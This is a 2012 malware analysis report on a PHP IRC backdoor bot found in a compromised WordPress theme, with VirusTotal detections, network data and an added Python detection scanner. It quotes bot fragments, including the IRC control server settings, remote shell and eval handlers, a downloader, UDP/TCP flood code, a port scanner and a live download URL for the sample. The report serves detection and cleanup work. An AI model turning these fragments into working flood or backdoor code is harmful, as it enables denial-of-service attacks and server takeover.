#OCJP-040 New Variant PHP/IRC DoS Tools (Win32/Posix)

unixfreaxjp, May 2nd, 2012
==============================
Operation Cleanup Japan
report: #OCJP-040
Base: http://unixfreaxjp.blogspot.jp/2012/05/ocjp-040.html
VT: https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
==============================
This is a PHP IRC bot malware found on a Japanese IDC server with a vulnerable WordPress theme plugin.
Currently under investigation as #OCJP case OCJP-040.

Below is the evidence of the object's malicious functionality:
==================
IRC base Bot:
==================
var $config = array("server"=>"irc.s4l1ty.info",
"port"=>6667,
"pass"=>"zero",
"prefix"=>"ZERO",
"maxrand"=>8,
"chan"=>"#zero",
"key"=>"",
"modes"=>"+iB-x",
"password"=>"zero",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname

==================
DNS Lookup
==================
config.inc.txt(15):  * .dns <IP|HOST> //dns lookup
config.inc.txt(206): case "dns":
config.inc.txt(212): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
config.inc.txt(216): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));

==================
SERVER REMOTE EXECUTION
==================
Designed to execute shell commands on a Unix or Windows host, as long as PHP is installed:

*  .sexec <cmd> // uses shell_exec() //execute a command
*  .exec <cmd> // uses exec() //execute a command
*  .cmd <cmd> // uses popen() //execute a command
*  .php <php code> // uses eval() //execute php code

==================
DOWNLOADER
==================
Download interface into the compromised system:
*  .download <URL> <filename> //download a file
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }

==================
HACKER GROUP ATTACK TOOLS
==================
This tool belongs to the following hacker group (credits embedded in the source):
#crew@corp. since 2003
edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
Friend: LP <fuckerboy@sercret.gov>

==================
INFECTION NOTIFICATION
==================
Reports the infection of the vulnerable machine to the IRC channel:
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");

==================
DoS / DDoS ATTACK TOOLS
==================
Three attack functions:

TCP FLOOD
-----------
*  .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
case "tcpflood":
if(count($mcmd)>5)
{$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)


UDP FLOOD
-----------
*  .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2Attack Iniciado com sucesso!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);fclose($fp);$i++;

PORT SCANNING
-----------
*  .pscan <host> <port> //port scan
case "pscan": // .pscan  6667
if(count($mcmd) > 2)
{ if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");

==================
Portuguese language is used a lot:
==================
Impossivel mandar e-mail.");
ensagem enviada para \2"
Nao foi possivel fazer o download. Permissao negada.

==================
SPYWARE
==================
Can send e-mail messages carrying the infected system's details to an address supplied via IRC; the same routine can be used for spamming:
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \n
{$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");}
else {$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");}
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");

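The fragments quoted above are enough to build a file-system detection for this family. The following Python scanner is an added example, not code from the OCJP-040 report or from any project it names: it turns the quoted fragments (the IRC config array, the \2-framed privmsg strings, the shell_exec/exec/popen/eval handlers, the UDP socket flood, the group tag and the infection notification) into weighted regular-expression indicators and scores PHP sources with them. The indicator weights, the thresholds and the two sample files are assumptions constructed for the demonstration; the tree walk deliberately ignores file extensions because the bot here was served as config.inc.txt, not as a .php file.

```python
"""Static indicator scan for the pbot-family PHP IRC bot described in OCJP-040.

Added example, not part of the original report or of any project's code.
Each regex is derived from a fragment quoted in the report; the weights,
thresholds and sample files are assumptions constructed for the demonstration.
"""
from __future__ import annotations

import re
from pathlib import Path

# name -> (weight, pattern).  Weights are an assumption for this example: a
# command-execution primitive reachable from IRC is what makes the file a
# backdoor, so those patterns carry the most weight.
INDICATORS = {
    # var $config = array("server"=>"irc...", "port"=>6667, ...)
    "irc_config": (2, re.compile(r'"server"\s*=>\s*"[^"]+",\s*"port"\s*=>\s*\d+')),
    # channel messages framed with \2 (IRC bold), e.g. "[\2dns\2]: ..."
    "irc_privmsg": (2, re.compile(r'privmsg\(.*?\[\\2\w+!?\\2\]')),
    # .sexec / .exec / .cmd handlers
    "remote_exec": (4, re.compile(r'\b(?:shell_exec|exec|popen|passthru|system)\s*\(')),
    # .php handler: eval() of attacker-supplied code
    "eval": (4, re.compile(r'\beval\s*\(')),
    # udpflood(): fsockopen("udp://".$host, ...)
    "udp_socket": (3, re.compile(r'fsockopen\(\s*"udp://')),
    # command names of the flood / scan handlers
    "dos_commands": (3, re.compile(r'\b(?:tcpflood|udpflood|pscan)\b')),
    # group signature embedded in the mail body
    "crew_tag": (5, re.compile(r'#crew@corp\. since 2003')),
    # infection notification posting the victim URL to the channel
    "vuln_report": (3, re.compile(r'\[\\2vuln!\\2\]')),
}

def scan_php_source(text: str) -> dict[str, int]:
    """Return {indicator: match_count} for every indicator present in text."""
    hits: dict[str, int] = {}
    for name, (_weight, pattern) in INDICATORS.items():
        count = len(pattern.findall(text))
        if count:
            hits[name] = count
    return hits

def score(hits: dict[str, int]) -> int:
    """Add each indicator's weight once; repeat matches do not inflate the score."""
    return sum(INDICATORS[name][0] for name in hits)

def classify(text: str) -> tuple[str, int, dict[str, int]]:
    """Label a PHP source text.  Thresholds are assumptions for this example:
    a lone exec() in theme code is a review item, not a verdict; the backdoor
    label needs an execution primitive plus the IRC/flood/notification context."""
    hits = scan_php_source(text)
    total = score(hits)
    if total >= 9 and ({"remote_exec", "eval"} & hits.keys()):
        label = "backdoor"
    elif total >= 5:
        label = "suspicious"
    elif total > 0:
        label = "review"
    else:
        label = "clean"
    return label, total, hits

def scan_tree(root: Path) -> list[tuple[Path, str, int]]:
    """Scan every regular file under root regardless of extension: the sample
    in the report was served as config.inc.txt, so a *.php-only sweep misses it."""
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        label, total, _hits = classify(text)
        if label != "clean":
            findings.append((path, label, total))
    return findings

# Constructed samples (assumptions for this example, not the original file).
# SAMPLE_BOT is an inert cut-down stand-in that only reproduces the quoted
# shapes; it has no IRC connection code and does nothing if executed.
SAMPLE_BOT = r'''<?php
var $config = array("server"=>"irc.example.invalid", "port"=>6667, "chan"=>"#zero");
case "dns":
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
case "sexec":
$this->privmsg($this->config['chan'],"[\2sexec\2]: ".shell_exec($mcmd[1]));
case "php":
eval($mcmd[1]);
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);
'''

SAMPLE_THEME = r'''<?php
// ordinary theme helper: one exec() for image optimisation, no IRC, no eval
function autofocus_optimize($file) { return exec("/usr/bin/jpegoptim " . escapeshellarg($file)); }
'''

if __name__ == "__main__":
    for name, text in (("SAMPLE_BOT", SAMPLE_BOT), ("SAMPLE_THEME", SAMPLE_THEME)):
        label, total, hits = classify(text)
        print(f"{name}: {label} (score {total}) {sorted(hits)}")
    # against a real web root: scan_tree(Path("/var/www/wp-content/themes"))
```

Treat the score as triage, not a verdict: the theme helper that legitimately calls exec() trips a single indicator and is marked for review, while the backdoor label requires an execution primitive together with the IRC configuration, channel messages and infection notification seen in this sample. The script needs only the standard library and runs offline.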
================================
MALWARE SOURCE
================================

--14:34:56--  http://happymeme.com/uzumaki//wp-content/themes/autofocus/config.inc.txt
           => `config.inc.txt'
Resolving happymeme.com... 112.78.112.187
Connecting to happymeme.com|112.78.112.187|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23,375 (23K) [text/plain]
100%[====================================>] 23,375        81.18K/s
14:34:59 (80.91 KB/s) - `config.inc.txt' saved [23375/23375]


================================
VIRUS TOTAL
================================
https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
nProtect                 : Trojan.Dropper.RYF
K7AntiVirus              : Backdoor
VirusBuster              : PHP.Shellbot.J
F-Prot                   : PHP/Pbot.B
Symantec                 : PHP.Backdoor.Trojan
Norman                   : PHP/Ircbot.BBPH
TrendMicro-HouseCall     : BKDR_PHPBOT.SM
Avast                    : PHP:IRCBot-AB [Trj]
ClamAV                   : PHP.Bot
Kaspersky                : Backdoor.PHP.Pbot.a
BitDefender              : Trojan.Dropper.RYF
Sophos                   : Troj/PHPBot-F
Comodo                   : Backdoor.PHP.Pbot.A
F-Secure                 : Trojan.Dropper.RYF
DrWeb                    : PHP.BackDoor.14
VIPRE                    : Backdoor.PHP.Pbot.b (v) (not malicious)
AntiVir                  : PHP/PBot.A.6
TrendMicro               : BKDR_PHPBOT.SM
McAfee-GW-Edition        : Heuristic.BehavesLike.JS.Suspicious.G
Emsisoft                 : Backdoor.PHP.Pbot!IK
eTrust-Vet               : PHP/Pbot.D
Jiangmin                 : Trojan/Script.Gen
Microsoft                : Trojan:PHP/Flader.A
GData                    : Trojan.Dropper.RYF
Commtouch                : PHP/Pbot.B
AhnLab-V3                : PHP/Pbot
VBA32                    : Backdoor.PHP.Pbot.a
PCTools                  : Malware.PHP-Backdoor
Rising                   : Trojan.Script.HTML.Agent.ab
Ikarus                   : Backdoor.PHP.Pbot
Fortinet                 : PHP/Pbot.AK!tr.bdr
AVG                      : PHP/BackDoor.K
Panda                    : Bck/Pbot.B

================================
NETWORK SOURCE
================================

Routing (AS)
-----------

IP:             112.78.112.187
inetnum:        112.78.112.0 - 112.78.112.255
netname:        SAKURA-NET
descr:          SAKURA Internet Inc.
country:        JP
admin-c:        KT749JP
tech-c:         KW419JP
remarks:        This information has been partially mirrored by APNIC from
remarks:        JPNIC. To obtain more specific information, please use the
remarks:        JPNIC WHOIS Gateway at
remarks:        http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks:        whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks:        defaults to Japanese output, use the /e switch for English
remarks:        output)
changed:        apnic-ftp@nic.ad.jp 20090303
changed:        apnic-ftp@nic.ad.jp 20090331
source:         JPNIC

112.78.112.0/20
SAKURA-C (4/OSAKA) SAKURA Internet // WEST JAPAN BACKBONE
1-8-15 Kyutaro-cho, Chuo Osaka 541-0056, Japan

AS9371
SAKURA-C SAKURA Internet // WEST JAPAN BACKBONE
Sakaisuji Honmachi Bldg. 9F 1-8-14 Minami-Honmachi,
Chuo-ku Osaka 541-0054, Japan

Domain
-----------

Domain Name:    happymeme.com
Created On:     2007-02-25 13:40:54.0
Last Updated On:        2012-02-27 21:37:36.0
Expiration Date:        2013-02-25 04:40:54.0
Status: ACTIVE
Registrant Name:        Whois Privacy Protection Service
Registrant Organization:        paperboy and co.
Registrant Street1:     2-7-21 Tenjin Chuo-ku
Registrant Street2:     Tenjin Prime 8F
Registrant City:        Fukuoka-shi
Registrant State:       Fukuoka
Registrant Postal Code: 8100001
Registrant Country:     JP
Registrant Phone:       81-927137999
Registrant Fax: 81-927137944
Tech Email: privacy@whoisprivacyprotection.info
Name Server: ns1.dns.ne.jp
Name Server: ns2.dns.ne.jp

--------------------------------------------------
Host names whose A records share this IP are under the
same risk as the current findings (112 items)
--------------------------------------------------
194964s.com
2103kakaku.com
aeru21.com
aeruzo.com
aeruzo.net
aitaiyoo.com
aitaizo.com
aitaizo.net
anzen-shisan.com
anzen-toushi.com
b-jays.net
biyo-neosta.com
boku-uma.com
cafebuono.net
carnavi-neosta.com
chanel-neosta.com
chusho-ma.biz
cosmo-support.com
cucina-style.com
cutie-eggs.com
daftbrain.com
dankai-club.com
daveswebworks.com
draxn.net
drbeverlynelson.com
earthworks1.com
ed3s.net
enyasuita.com
extank.com
fukuirin.com
fx-toushi.biz
gaika-yokin.org
gakushi110.com
gan-kenko.com
gooddieter.org
gucci-neosta.com
hajikunshop.com
happyguide.biz
happyguide.info
happymailz.com
happymailz.net
happymeme.com
hlj93.com
hpmls.net
ichikawayuu.com
iheya-genkimura.org
iirufa.com
japangoodsplaza.com
jewelry-neosta.com
ji-joutatsu.com
kanakana-piano.com
kineyakatsuroku.com
koi-iro.com
kojimatsubasa.com
koshunyujob.com
kotaninene.com
kounojimusyo.com
loaddarthtrader.com
lumiere4.com
luxy-party.com
m2051.com
macj-log.com
mail.nagasaka-web.net
mail.s-smile.net
marujyohome.com
mild7-1.net
morigen.info
morita29.com
nagasaka-web.net
newsharaku.com
nibo6.com
nitoroy.com
npo-bsk.com
npo-hima.net
okamotoann.com
onyanco.com
oonoyohei.com
oota-amaharashi.jp
ozakikana.com
penki-nurikae.com
potyari.biz
recorder-neosta.com
redrox.net
reiki-a.com
reiki-dream.net
rightsangyou.com
ryuzo-nakata.com
s-smile.net
sakaidaiki.com
sankei-inc.com
sekengaku.org
sekiaya.com
sheadream.com
shibataindustries.com
shimadadaiki.com
shisan-unyou.info
smileagefan.com
t-zei.jp
ton-kichi.net
toushi-fx.net
uchiyamahinata.com
www.h-sketch.com
www.oota-amaharashi.jp
www.penki-nurikae.com
www.t-zei.jp
xn--torr3dy20axh7a.com (.com)
yamacho-club.com
yen-energy.com
yoke-kichijoji.com
yokohamahikari.com
yosapark-saribaba.com
yurai-seitai.net
------
ZeroDay Japan http://0day.jp
OPERATION CLEANUP JAPAN | #OCJP
Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com